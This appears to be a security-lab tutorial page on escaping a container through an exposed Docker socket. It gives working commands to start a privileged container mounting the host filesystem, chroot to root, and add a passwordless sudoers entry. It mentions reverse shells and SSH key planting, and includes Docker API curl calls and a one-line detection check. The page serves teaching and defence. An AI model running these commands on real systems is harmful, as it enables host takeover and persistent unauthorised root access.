⚠️ Pracivo Security Lab — Docker escape, Kubernetes misconfig, CI/CD secret exposure, supply chain attacks.
Exposed Docker Socket — Container Escape
CONTAINER ESCAPE
HOST TAKEOVER
# Docker socket (/var/run/docker.sock) gives full control over the Docker daemon
# If it's mounted inside a container, you can escape to the host
# Step 1: Check if socket is mounted
ls -la /var/run/docker.sock
# -rw-r--r-- 1 root docker /var/run/docker.sock ← you're inside a container with this!
# Step 2: Use the socket to create a privileged container that mounts the host
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host --net=host --ipc=host -v /:/host alpine /bin/sh
# You are now in a new container with the HOST filesystem at /host
chroot /host # switch root to host filesystem
id # uid=0(root)
# Step 3: Add yourself to /etc/sudoers on the host
echo "ram ALL=(ALL) NOPASSWD: ALL" >> /host/etc/sudoers
# Or drop a reverse shell as root on the host
# Or add an SSH key to /host/root/.ssh/authorized_keys
# Alternative — via Docker API directly
curl --unix-socket /var/run/docker.sock http://localhost/containers/json
curl --unix-socket /var/run/docker.sock -X POST -H "Content-Type: application/json" -d '{"Image":"alpine","Cmd":["/bin/sh"],"Binds":["/:/host"],"Privileged":true}' http://localhost/containers/create
# Detect with: docker inspect container_name | grep -i "sock\|docker.sock"